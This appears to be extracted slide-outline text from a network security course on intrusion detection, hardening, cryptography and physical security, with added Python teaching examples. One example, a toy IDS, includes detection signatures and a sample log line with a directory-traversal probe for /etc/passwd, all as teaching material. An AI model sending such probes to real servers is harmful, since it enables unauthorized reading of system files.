True positives
True negatives
False negatives
o IDS missed an attack
False positives
o Benign activity reported as malicious
Types of IDS
Network-based (NIDS)
o Monitors network traffic
o Provides early warning system for attacks
Host-based (HIDS)
o Monitors activity on host machine
o Able to stop compromises while they are in progress
Network-based IDS
Uses a dedicated platform for purpose of monitoring network activity
Analyzes all passing traffic
Sensors have two network connections
o One operates in promiscuous mode to sniff passing traffic
o An administrative NIC sends data such as alerts to a centralized management system
NIDS Architecture
Place IDS sensors strategically to defend most valuable assets
Typical locations of IDS sensors
o Just inside the firewall
o On the DMZ
o On the server farm segment
o On network segments connecting mainframe or midrange hosts
SPAN
Allows traffic sent or received in one interface to be copied to another monitoring interface
Typically used for sniffers or NIDS sensors
Limitations of SPAN
Traffic between hosts on the same segment is not monitored; only traffic leaving the segment crosses the monitored link
Switch may offer limited number of SPAN ports or none at all
Hub
Device for creating LANs that forwards every packet received to every host on the LAN
Allows only a single port to be monitored
Tap
Fault-tolerant hub-like device used inline to provide IDS monitoring in switched network infrastructures
Host-based IDS
Primarily used to protect only critical servers
Software agent resides on the protected system
Detects intrusions by analyzing logs of operating systems and applications, resource utilization, and other system activity
Use of resources can have impact on system performance
HIDS Software
Host wrappers
o Inexpensive and deployable on all machines
o Do not provide in-depth, active monitoring measures of agent-based HIDS products
Agent-based software
o More suited for single purpose servers
Used in networks where the IDS administrator has carefully tuned the sensor's behavior to minimize the number of false positive alarms
TCP Reset
Signature detection
o Also known as misuse detection
o IDS analyzes information it gathers and compares it to a database of known attacks, which are identified by their individual signatures
Anomaly detection
o Baseline is defined to describe normal state of network or host
o Any activity outside baseline is considered to be an attack
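An added example, not from the slides, that puts the two detection methods just described (and the signature-based and anomaly-based detection slides earlier in the deck) side by side over constructed web-server log lines: signature matching against a small rule list, and anomaly detection against a statistical baseline of requests per client. The log lines, rules and baseline are all constructed here.

```python
"""Added example (not from the slides): signature-based vs. anomaly-based
detection over constructed access-log lines of the form
'<client-ip> <request-path> <status>'."""
import re
import statistics
from collections import Counter
from typing import Dict, List, Tuple


def make_log(clients: List[Tuple[str, int]], path: str = "/index.html") -> List[str]:
    """Build constructed log lines: n requests for `path` from each client."""
    return [f"{ip} {path} 200" for ip, n in clients for _ in range(n)]


# Training window: ordinary browsing, used only to build the baseline
TRAINING_LOG = make_log([("10.0.0.1", 4), ("10.0.0.2", 5), ("10.0.0.3", 6),
                         ("10.0.0.4", 5), ("10.0.0.5", 5)])

# Live window: one noisy but harmless client (20 page views) and one
# client whose three requests include a known probe
LIVE_LOG = (make_log([("10.0.0.1", 5)])
            + make_log([("10.0.0.2", 20)], "/news.html")
            + ["10.0.0.3 /index.html 200",
               "10.0.0.3 /cgi-bin/../../etc/passwd 404",
               "10.0.0.3 /about.html 200"])

# Signature database: each known misuse is identified by a pattern
SIGNATURES = [
    ("dir-traversal", re.compile(r"\.\./")),
    ("passwd-probe", re.compile(r"/etc/passwd")),
    ("cmd-exec", re.compile(r"cmd\.exe", re.IGNORECASE)),
]


def parse(line: str) -> Tuple[str, str, int]:
    ip, path, status = line.split()
    return ip, path, int(status)


def signature_alerts(lines: List[str]) -> List[Tuple[str, str]]:
    """Signature-based: compare every request with the signature list and
    take an action (here: record an alert) on the first match. Anything
    not in the list, however hostile, produces no alert."""
    alerts = []
    for line in lines:
        ip, path, _ = parse(line)
        for name, pattern in SIGNATURES:
            if pattern.search(path):
                alerts.append((ip, name))
                break
    return alerts


def build_baseline(lines: List[str]) -> Tuple[float, float]:
    """Anomaly-based, step 1: statistical profile (mean and standard
    deviation) of requests per client over a period of normal activity."""
    per_client = Counter(parse(line)[0] for line in lines)
    values = list(per_client.values())
    return statistics.mean(values), statistics.pstdev(values)


def anomaly_alerts(lines: List[str], baseline: Tuple[float, float],
                   k: float = 3.0) -> Dict[str, int]:
    """Anomaly-based, step 2: any client more than k standard deviations
    above the baseline mean is reported, whether or not it is hostile,
    which is where the false positives come from."""
    mean, stdev = baseline
    threshold = mean + k * stdev
    per_client = Counter(parse(line)[0] for line in lines)
    return {ip: n for ip, n in per_client.items() if n > threshold}
```

On the constructed live window the signature engine flags only the traversal probe, while the anomaly engine flags only the busy but harmless client and misses the three-request probe entirely.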
Honeypots
False systems that lure intruders and gather information on methods and techniques they use to penetrate networks by purposely becoming victims of their attacks
Simulate unsecured network services
Make forensic process easy for investigators
Commercial Honeypots
ManTrap
Specter
Smoke Detector
NetFacade
Honeypot Deployment
Goal
o Gather information on hacker techniques, methodology, and tools
Options
o Conduct research into hacker methods
o Detect attacker inside organization's network perimeter
Honeypot Design
Must attract, and avoid tipping off, the attacker
Must not become a staging ground for attacking other hosts inside or outside the firewall
Incident Response
Every IDS deployment should include two documents to answer "what now" questions
IDS Monitoring
Requires well-documented monitoring procedures that detail actions for specific alerts
Chapter Summary
Two major types of intrusion detection
o Network-based IDS (monitor network traffic)
o Host-based IDS (monitor activity on individual computers)
Security Baselines
Chapter 13
Learning Objectives
Gain an understanding of OS/NOS vulnerabilities and hardening practices
Understand the operation of a file system and how to secure a file system
Explore common network hardening practices, including firmware updates and configuration best practices
Identify network services commonly exploited by attackers and learn best practices for writing access control lists
Explore vulnerabilities regarding network services such as Web, FTP, DNS, DHCP, Mail, File/Print Servers and Data Repositories as well as best practices in securing such services
Recognizes input from keyboard
Sends output to display screen
Keeps track of files and directories on the disk
Controls peripheral devices (disk drives, printers)
OS/NOS Hardening
Process of modifying an OS's default configuration to make it more secure to outside threats
May include removal of unnecessary programs and services
May include application of patches to system kernel to limit vulnerability
File Systems
Store data that enable communication between an application and its supporting disk drives
Setting privileges and access controls protects information stored on the computer
o Common privileges: read, write (modify), lock, append, and execute
o Group users by common needs
o Additional rights can be granted to a single user in a group
o Principle of least privilege
No world-writable files unless specifically required
Mount file systems as read only and nosuid
Assign access permission of immutable to all kernel files
Establish all log files as append only
Prevent users from installing, removing, or editing scripts
Pay attention to access control inheritance when defining categories of files and users
Network Hardening
Crucial to have a network with availability as well as adequate security
Firmware Updates
Made available by vendors as vulnerabilities and malfunctions are discovered with previous versions
Configuration
Routing functions
o Designed to route packets efficiently and reliably, but not securely
o Not to be used to implement a security policy
Firewall systems
o Should govern security of information flow in and out of the network
o Provide a policy enforcement mechanism at a security domain boundary
Obtain IP addresses from ISP that connects to the firewall
Obtain IP addresses from within the organization, typically from RFC 1918 specification
Packet Filtering
Process of deciding disposition of each packet that can pass through a router
Provides basic protection mechanism for a routing firewall device through inspection of packet contents
Can be based on intrinsic or extrinsic information pertaining to a data packet
Application Hardening
Process of making application software secure by ensuring that the software contains security enabling technology:
o Sign-in capabilities for authenticated network connections
o Ability to run properly in secured configurations
Web Servers
Associated with more attacks and vulnerabilities than any type of server
Designed to make information accessible, rather than to protect it
E-mail Servers
Serious risks associated with ability to receive email from the outside world
o Attachments with malicious contents
o E-mails with abnormal MIME headers
o Scripts embedded into HTML-enabled mail
FTP Servers
File Transfer Protocol
DNS Servers
Domain Name Service (DNS)
o Collective name for system of servers that translate names into addresses in a process transparent to the end user
NNTP Servers
Network News Transfer Protocol (NNTP)
o Delivers news articles to users on the Internet
o Stores articles in a central database; users choose only items of interest
o Makes few demands on structure, content, or storage of news articles
NNTP servers can index and cross reference messages, and allow for notification of expiration
Similar vulnerabilities to other network services
Effective methods of preventing attacks
o Use proper authentication mechanisms
o Disable unneeded services
o Apply relevant software and OS patches
DHCP Servers
Dynamic Host Configuration Protocol (DHCP)
o Software that assigns dynamic IP addresses to devices on a network
o Reduces administrative burden
o No security provisions
Collect Media Access Control (MAC) addresses of all computers on network and bind them to corresponding IP addresses
Use dynamic addressing, but monitor log files
Use intrusion detection tools
Data Repositories
Store data for archiving and user access
Contain an organization's most valuable assets in terms of information
Should be carefully protected
Directory Services
Lightweight Directory Access Protocol (LDAP)
o Industry standard protocol for providing networking directory services for the TCP/IP model
o Can store and locate information about entities and other network resources
o Based on simple, treelike hierarchy called a Directory Information Tree (DIT)
Authentication
o Anonymous
o Simple
o Simple Authentication and Security Layer (SASL) for LDAPv3
Authorization
Chapter Summary
Role of operating and file systems as they relate to security of information resources stored on computer systems
Operating system vulnerabilities
Use of OS hardening practices to prevent attacks and system failures
Vulnerabilities associated with common services installed on computer systems (WWW services, FTP, DNS) and best practices in protecting against threats to these services
Maintenance and upgrade of computer systems
Cryptography
Chapter 14
Learning Objectives
Understand the basics of algorithms and how they are used in modern cryptography
Identify the differences between asymmetric and symmetric algorithms
Have a basic understanding of the concepts of cryptography and how they relate to network security
Learning Objectives
Discuss characteristics of PKI certificates and the policies and procedures surrounding them
Understand the implications of key management and a certificate's lifecycle
Cryptography
Study of complex mathematical formulas and algorithms used for encryption and decryption
Allows users to transmit sensitive information over unsecured networks
Can be either strong or weak
Cryptography Terminology
Plaintext
o Data that can be read without any manipulation
Encryption
o Method of disguising plaintext to hide its substance
Ciphertext
o Plaintext that has been encrypted and is an unreadable series of symbols and numbers
Algorithms
Mathematical functions that work in tandem with a key
Same plaintext data encrypts into different ciphertext with different keys
Security of data relies on:
Hashing
Method used for verifying data integrity
Uses variable-length input that is converted to a fixed-length output string (hash value)
Asymmetric
Symmetric Algorithms
Usually use same key for encryption and decryption
Encryption key can be calculated from decryption key and vice versa
Require sender and receiver to agree on a key before they communicate securely
Security lies with the key
Also called secret key algorithms, single-key algorithms, or one-key algorithms
Categories of Algorithms
Stream algorithms
o Operate on the plaintext one bit at a time
Block algorithms
o Encrypt and decrypt data in groups of bits, typically 64 bits in size
Asymmetric Algorithms
Use different keys for encryption and decryption
Decryption key cannot be calculated from the encryption key
Anyone can use the key to encrypt data and send it to the host; only the host can decrypt the data
Also known as public key algorithms
Digital Signatures
Based on asymmetric algorithms, allow the recipient to verify whether a public key belongs to its owner
Certificates
Credentials that allow a recipient to verify whether a public key belongs to its owner
o Verify sender's information with identity information that is bound to the public key
Components
o Public key
o One or more digital signatures
o Certificate information (e.g., user's name, ID)
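An added example, not from the slides, tying together the hashing, asymmetric-algorithm, digital-signature and certificate slides: a textbook RSA key pair, a SHA-256 hash that is signed, and a toy certificate carrying the three components listed above (certificate information, public key, CA signature). The primes, names and certificate layout are constructed for illustration; real PKI uses X.509 and far larger keys.

```python
"""Added example (not from the slides): hashing, textbook RSA signatures and a
toy certificate binding a public key to a name. All values constructed."""
import hashlib
import json
from typing import Dict, Tuple

PublicKey = Tuple[int, int]   # (n, e)
PrivateKey = Tuple[int, int]  # (n, d)


def hash_to_int(data: bytes, n: int) -> int:
    """Hashing: variable-length input -> fixed-length SHA-256 digest, here
    reduced modulo n so the toy key can sign it."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def keygen(p: int, q: int, e: int = 65537) -> Tuple[PublicKey, PrivateKey]:
    """Asymmetric key pair: (n, e) is published, d stays private and cannot
    be derived from (n, e) without factoring n."""
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    return (n, e), (n, d)


def sign(priv: PrivateKey, data: bytes) -> int:
    """Digital signature: the hash of the data raised to the private exponent."""
    n, d = priv
    return pow(hash_to_int(data, n), d, n)


def verify(pub: PublicKey, data: bytes, sig: int) -> bool:
    """Anyone holding the public key can check the signature, nobody else
    could have produced it."""
    n, e = pub
    return pow(sig, e, n) == hash_to_int(data, n)


def canonical(fields: Dict) -> bytes:
    """Deterministic serialization of the fields the CA signs."""
    return json.dumps(fields, sort_keys=True).encode()


def issue_certificate(ca_priv: PrivateKey, subject: str,
                      subject_pub: PublicKey, issuer: str) -> Dict:
    """Certificate components: certificate information (subject, issuer),
    the subject's public key, and the CA's signature binding the two."""
    fields = {"subject": subject, "issuer": issuer,
              "public_key": list(subject_pub)}
    return {**fields, "signature": sign(ca_priv, canonical(fields))}


def verify_certificate(cert: Dict, ca_pub: PublicKey) -> bool:
    """Any change to the name or key breaks the CA's signature."""
    fields = {k: v for k, v in cert.items() if k != "signature"}
    return verify(ca_pub, canonical(fields), cert["signature"])


def verify_signed_message(cert: Dict, ca_pub: PublicKey,
                          message: bytes, sig: int) -> bool:
    """Recipient's check: trust the CA, use the certificate to learn whose
    public key this is, then verify the message signature with that key."""
    if not verify_certificate(cert, ca_pub):
        return False
    return verify(tuple(cert["public_key"]), message, sig)


# Constructed keys from small primes (real keys are 2048 bits or more)
CA_PUB, CA_PRIV = keygen(1000003, 999983)
ALICE_PUB, ALICE_PRIV = keygen(999979, 1000033)
ALICE_CERT = issue_certificate(CA_PRIV, "alice@example.test", ALICE_PUB, "Example CA")
```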
PKI Revocation
Certificates have a restricted lifetime; a validity period is created for all certificates
Certificate revocation list (CRL)
Trust Models
Techniques that establish how users validate certificates
Web of Trust
Combines concepts of direct trust and hierarchical trust
Adds the idea that trust is relative to each requester
Central theme: the more information available, the better the decision
Registration
User requests certificate from CA
CA verifies identity and credentials of user
Certificate practice statement
o Published document that explains CA structure to users
o Who may serve as CA
o What types of certificates may be issued
o How they should be issued and managed
Certificates
Distinguished name (DN)
o Unique identifier that is bound to a certificate by a CA
o Uses a sequence of character(s) that is unique to each user
Out-of-band distribution
In-band distribution
Publication
Centralized repositories with controlled access
Key Backup
Addresses lost keys
Helps recover encrypted data
Essential element of business continuity and disaster recovery planning
Key Escrow
Key administration process that utilizes a third party
Initialization phase involves:
Cancellation Procedures
Certificate expiration
Certificate revocation
Key history
Key archive
Certificate Expiration
Occurs when validity period of a certificate expires
Options upon expiration
Certificate Revocation
Implies cancellation of a certificate prior to its natural expiration
Revocation delay
Certificate Revocation
How notification is accomplished
o Certificate revocation lists (CRLs)
o CRL distribution points
o Certificate revocation trees (CRTs)
o Redirect/Referral CRLs
o Short certificate lifetimes
o Single-entity approvals
Key History
Deals with secure and reliable storage of expired keys for later retrieval to recover encrypted data
Applies more to encryption keys than signing keys
Key Archive
Service undertaken by a CA or third party to store keys and verification certificates
Meets audit requirements and handles resolution of disputes when used with other services (e.g., time stamping and notarization)
Chapter Summary
Ways that algorithms and certificate mechanisms are used to encrypt data flows
Concepts of cryptography
Key and certificate life cycle management
Physical Security
Chapter 15
Learning Objectives
Understand the importance of physical security
Discuss the impact of location on a facility's security
Identify major material factors when constructing a facility
Understand how various physical barriers can enhance protection of vital resources
Learning Objectives
Discuss the various biometric techniques used for access control
Understand the importance of fire safety and fire detection
Physical Controls
When managing a network environment, it is critical to secure:
o Equipment
o Data
o Power supplies
o Wiring
o Personnel with access to the location
Construction
Wall materials
o Combustibility, load and weight bearing ratings
Windows
o Shatterproof, wired for alarms
Location of shutoff valves for water and gas lines
Location of fire detection and suppression devices
Physical Barriers
Address perimeter security
Types of physical barriers
Types of Locks
Preset locks
Cipher locks
Biometric locks
Multicriteria locks
Device locks
Preset Locks
Typical locks that utilize a physical lock and key
Least secure
Cipher Locks
Programmable locks that utilize a keypad for entering a PIN or password
More expensive than preset locks
Offer more security and flexibility
Cipher lock options
Biometric Locks
Verify user's identity by a unique personal characteristic
Complex, expensive, and secure
Multicriteria Locks
Combine strengths of other lock types
As complexity increases, so does cost and security
Device Locks
Secure computer hardware and network devices
Types
o Cable lock (best known)
o Switch controls
o Slot locks
o Port controls
o Cable traps
Cable Locks
Fencing
Controls access to entrances
Cost is directly related to:
Lighting
Deters intruders
Provides safe environment for personnel
Physical Surveillance
Security guards
Guard dogs
Technical Controls
Personnel access controls
Surveillance
Ventilation
Power supply
Fire detection and suppression
Identification Cards
Biometric Systems
Scan personal characteristics of a user and compare them to the record created when the user was added to the system
Technical Surveillance
Closed-circuit television cameras
o Can be monitored at a central location
o Record all activity that takes place within critical areas
o Allow security personnel to assess whether or not an area is being compromised
Ventilation
Maintain air quality with a closed-loop recirculating air-conditioning system
Control contamination from dust and other pollutants with positive pressurization and ventilation
Power Supply
Main methods to protect against power failure
Fire Suppression
Select fire suppression materials carefully
Forms of fire detection response systems
o Manual fire alarm pull-down devices
o Automatic sensors
Natural Disasters
Floods
Lightning
Earthquakes
Chapter Summary
Physical security
o Physical controls: location, construction, physical barriers
o Technical controls: personnel access controls, surveillance, ventilation